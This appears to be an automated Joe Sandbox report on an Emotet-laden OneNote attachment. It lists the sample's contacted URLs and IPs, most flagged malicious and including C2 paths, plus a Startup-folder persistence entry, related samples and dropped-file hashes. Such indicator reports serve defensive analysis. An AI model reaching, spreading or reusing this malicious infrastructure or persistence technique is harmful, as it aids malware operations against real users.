https://api.diagnostics.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://187.63.160.88:80/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.office.de/addinstemplate	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://103.43.75.120/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wus2.pagecontentsync.	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/datasets	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://penshorn.org:443/admin/Ses8712iGR8du/on	wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici/9/xM	wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cortana.ai/api	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://169.57.156.166:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/~	regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.diagnosticssdf.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
103.132.242.26	unknown	India	45117	INPL-IN-APIshansNetworkIN	true
104.168.155.143	unknown	United States	54290	HOSTWINDSUS	true
79.137.35.198	unknown	France	16276	OVHFR	true
115.68.227.76	unknown	Korea Republic of	38700	SMILESERV-AS-KRSMILESERVKR	true
163.44.196.120	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
206.189.28.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
203.26.41.131	penshorn.org	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
107.170.39.149	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
66.228.32.31	unknown	United States	63949	LINODE-APLinodeLLCUS	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
185.4.135.165	unknown	Greece	199246	TOPHOSTGR	true
183.111.227.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
169.57.156.166	unknown	United States	36351	SOFTLAYERUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
139.59.126.41	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
167.172.253.162	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
167.172.199.165	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
202.129.205.3	unknown	Thailand	45328	NIPA-AS-THNIPATECHNOLOGYCOLTDTH	true
147.139.166.154	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
153.92.5.27	unknown	Germany	47583	AS-HOSTINGERLT	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.226.75	unknown	United States	63949	LINODE-APLinodeLLCUS	true
164.90.222.65	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
213.239.212.5	unknown	Germany	24940	HETZNER-ASDE	true
5.135.159.50	unknown	France	16276	OVHFR	true
186.194.240.217	unknown	Brazil	262733	NetceteraTelecomunicacoesLtdaBR	true
119.59.103.152	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
159.89.202.34	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
91.121.146.47	unknown	France	16276	OVHFR	true
160.16.142.56	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
201.94.166.162	unknown	Brazil	28573	CLAROSABR	true
91.207.28.33	unknown	Kyrgyzstan	39819	PROHOSTKG	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
103.43.75.120	unknown	Japan	20473	AS-CHOOPAUS	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
45.235.8.30	unknown	Brazil	267405	WIKINETTELECOMUNICACOESBR	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
187.63.160.88	unknown	Brazil	28169	BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR	true
82.223.21.224	unknown	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
95.217.221.146	unknown	Germany	24940	HETZNER-ASDE	true
149.56.131.28	unknown	Canada	16276	OVHFR	true
182.162.143.56	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
94.23.45.86	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	828507
Start date and time:	2023-03-17 09:22:39 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	iMedPub_LTD_4.one
Detection:	MAL
Classification:	mal100.troj.expl.evad.winONE@11/318@1/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 50.2% (good quality ratio 42.4%) Quality average: 60.5% Quality standard deviation: 35.6%
HCA Information:	Successful, ratio: 89% Number of executed functions: 20 Number of non-executed functions: 135
Cookbook Comments:	Found application associated with file extension: .one Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, rundll32.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.223.130.133, 20.231.69.218, 20.126.106.131, 20.223.225.174, 23.10.249.161, 23.10.249.147
Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:24:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
09:24:22	API Interceptor	2x Sleep call for process: wscript.exe modified
09:24:50	API Interceptor	22x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
110.232.117.186	INNOVINC.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse
	Omics_Journal.one	Get hash	malicious	Emotet	Browse
	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
103.132.242.26	INNOVINC.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse
	Omics_Journal.one	Get hash	malicious	Emotet	Browse
	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
penshorn.org	INNOVINC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RACKCORP-APRackCorpAU	INNOVINC.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OMICS.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_International.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	opastonline.com.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	INNOVINC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	aRThcK3rSO.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader	Browse	203.26.41.131
	click.wsf	Get hash	malicious	Emotet	Browse	203.26.41.131
	setup.exe	Get hash	malicious	Amadey, Djvu, RedLine, SmokeLoader	Browse	203.26.41.131

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll	INNOVINC.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_2.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_3.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing_4.one	Get hash	malicious	Emotet	Browse
	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse
	Omics_Journal.one	Get hash	malicious	Emotet	Browse
	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62582
Entropy (8bit):	7.996063107774368
Encrypted:	true
SSDEEP:	1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
MD5:	E71C8443AE0BC2E282C73FAEAD0A6DD3
SHA1:	0C110C1B01E68EDFACAEAE64781A37B1995FA94B
SHA-256:	95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
SHA-512:	B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
Malicious:	false
Preview:	MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k....Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G\|.[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.127437612314223
Encrypted:	false
SSDEEP:	6:kKJry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:9CvkPlE99SNxAhUext
MD5:	7D726CFE78034041E545AD9B325089C9
SHA1:	0CDD11257D735EF4E8EFA8B3F32B34684AB2212A
SHA-256:	7371A8747B9FEC13AAB815E55D3141C50B30EFD2769E3561C163F751022A695D
SHA-512:	5BE69C0274607D98F712D4D4C94F4DBEB088B899857A389DBFD0C5F16312B276189086CA097BBEAA59FCE36DDF4DE55CF3ED14A024F84903486422310367D5F9
Malicious:	false
Preview:	p...... ........)....X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\825FCF33-FA95-48F7-9D0C-913B41374CD9

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154907
Entropy (8bit):	5.352034377456741
Encrypted:	false
SSDEEP:	1536:T+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:ScQ9DQl+zrXgb
MD5:	89BC098EEB8EEBAABDB3FC0E26A4140B
SHA1:	6FFFA4656210D54FFA2EC2002D46A49493C05E4A
SHA-256:	F1630234A48B9FCA505A8790D9B460069490B813177EC79AC5A6D26038D6B3C0
SHA-512:	897F4D8BF026FD9E1F8B06DC5D663A4BD8E16230339C10151EBCC2F35E0DE1E46B7F4609A2E81975DDDAABD9E05830003112ACD2999F02B637F21DA9FBC087CD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T08:23:38">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) 8, numeric, rows 262223750, columns 0
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.466047470914599
Encrypted:	false
SSDEEP:	3:ulXdtLBllr/PtlLtl:K7Bz/jX
MD5:	23D6A6D74EB2CF9736D1E7338F0D4804
SHA1:	269C8EBAA767626C04CFC43974D17B0DDD7C91CC
SHA-256:	72CA40874CD7FA779586D65CD1FA9A16DF677749DDE81AC7803A93B51E3848C0
SHA-512:	C33B830C5CCEDE3C3E88FAE6F75E44F46427A60647AE0B8E1834C782C799428D8AB842D2BB6B7D1746DDBBB5F4AC4E9F1DE29844C59CC9FF50735A508B54D825
Malicious:	false
Preview:	.....7..........-...8..........................@,......@P...............

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
